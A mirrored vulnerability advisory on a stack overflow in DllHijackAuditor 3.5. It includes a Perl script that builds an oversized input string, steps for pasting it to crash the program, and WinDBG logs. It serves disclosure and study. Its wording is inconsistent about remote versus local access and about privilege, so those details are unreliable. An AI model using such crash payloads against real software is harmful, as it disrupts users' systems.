首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DllHijackAuditor 3.5 - Stack Overflow Vulnerability
来源:www.zwx.fr 作者:ZwX 发布时间:2016-09-22  
Technical Details & Description:
================================
A local stack buffer overflow vulnerability has been discovered in the official DllHijackAuditor v3.5 software.
The overflow vulnerability allows remote attackers to take-over the process by overwrite of the active registers.
  
The stack buffer overflow vulnerability is located in the `Specify Extension Entry` module of the software. Local attackers are 
able to include unicode as malicious payload to crash software via stack overflow. Thus allows the local attacker to 
overwrite for example the eip register to take control of the vulnerable software process. 
  
The security risk of the issue is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. 
Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction. 
Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system.
  
Vulnerable Input(s):
           [+] Specify Extension - (Entry)
  
  
Proof of Concept (PoC):
=======================
A local stack overflow vulnerability can be exploited by local attackers without user interaction and with privileged system user account.
For security demonstration or to reproduce the sofwtare vulnerability follow the provided information and steps below to continue.
  
Manual steps to reproduce the vulnerability ...
1. Launch the DllHijackAuditors.exe software process
2. Run the code in perl and a file format (.txt) will create
3. Copy  the AAAAAAAAA+... string from DllHijackAuditor.txt to clipboard
4. Paste it to the input Specify Extension AAAAAAAAA+... string and click `Start Audit` to process
5. Software crash permanently by a stack overflow
6. Successfully reproduce of the local stack buffer overflow vulnerability!
  
  
PoC: Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 3000;
open(MYFILE,'>>DllHijackAuditor.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwXn";
  
  
--- PoC Debug Session Logs [WinDBG] ---
Stack buffer overflow - code c0000409 (!!! second chance !!!)
eax=00000001 ebx=0059c60c ecx=00000005 edx=773913f0 esi=0766fc7c edi=0014d2c0
eip=00529e5b esp=0766f5b8 ebp=0766f5d0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
DllHijackAuditor+0x129e5b:
00529e5b cd29            int     29h
  
EXCEPTION_RECORD:  ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00529e5b (DllHijackAuditor+0x00129e5b)
   ExceptionCode: c0000409 (Stack buffer overflow)
   ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 00000005
  
FAULTING_THREAD:  00000754
BUGCHECK_STR:  STACK_OVERRUN
PROCESS_NAME:  DllHijackAuditor.exe
FAULTING_MODULE: 77300000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP:  534bb17f
ERROR_CODE: (NTSTATUS) 0xc0000409 - Le syst me a d tect  la saturation de la m moire tampon dans cette application. Cette saturation pourrait permettre   un utilisateur mal intentionn  de prendre le contr le de cette application.
DEFAULT_BUCKET_ID:  WRONG_SYMBOLS
LAST_CONTROL_TRANSFER:  from 00529e49 to 00529e5b
  
0:004> d esi
0766fc7c  00 3a 5c 55 73 65 72 73-5c 5a 77 58 5c 41 70 70  .:\Users\ZwX\App
0766fc8c  44 61 74 61 5c 4c 6f 63-61 6c 5c 54 65 6d 70 5c  Data\Local\Temp\
0766fc9c  44 6c 6c 48 69 6a 61 63-6b 41 75 64 69 74 5f 41  DllHijackAudit_A
0766fcac  70 70 43 72 61 73 68 56-69 65 77 2e 65 78 65 5f  ppCrashView.exe_
0766fcbc  32 30 30 34 37 33 35 35-33 36 5c 74 65 73 74 2e  2004735536\test.
0766fccc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcdc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:004> d 0766fcec
0766fcec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fcfc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd0c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd1c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd2c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd3c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd4c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0766fd5c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
  
  
[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
  
  
Domain:     www.zwx.fr
Contact:    msk4@live.fr        
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
                     packetstormsecurity.com/files/author/12026/
                     0day.today/author/27461
  
  
                                                     Copyright © 2016 | ZwX - Security Researcher (Software & web application)
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VegaDNS 0.13.2 - Remote Comman
·Kaltura 11.1.0-2 - Remote Code
·Dolphin 7.3.0 - Error-Based SQ
·Microsoft Internet Explorer 11
·ZineBasic 1.1 - Arbitrary File
·Kerberos in Microsoft Windows
·EKG Gadu 1.9~pre+r2855-3+b1 -
·Metasploit Web UI - Diagnostic
·PHP 5.0.0 - 'tidy_parse_file()
·Metasploit Web UI Static secre
·Docker Daemon Privilege Escala
·Android Stagefright MP4 tx3g I
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved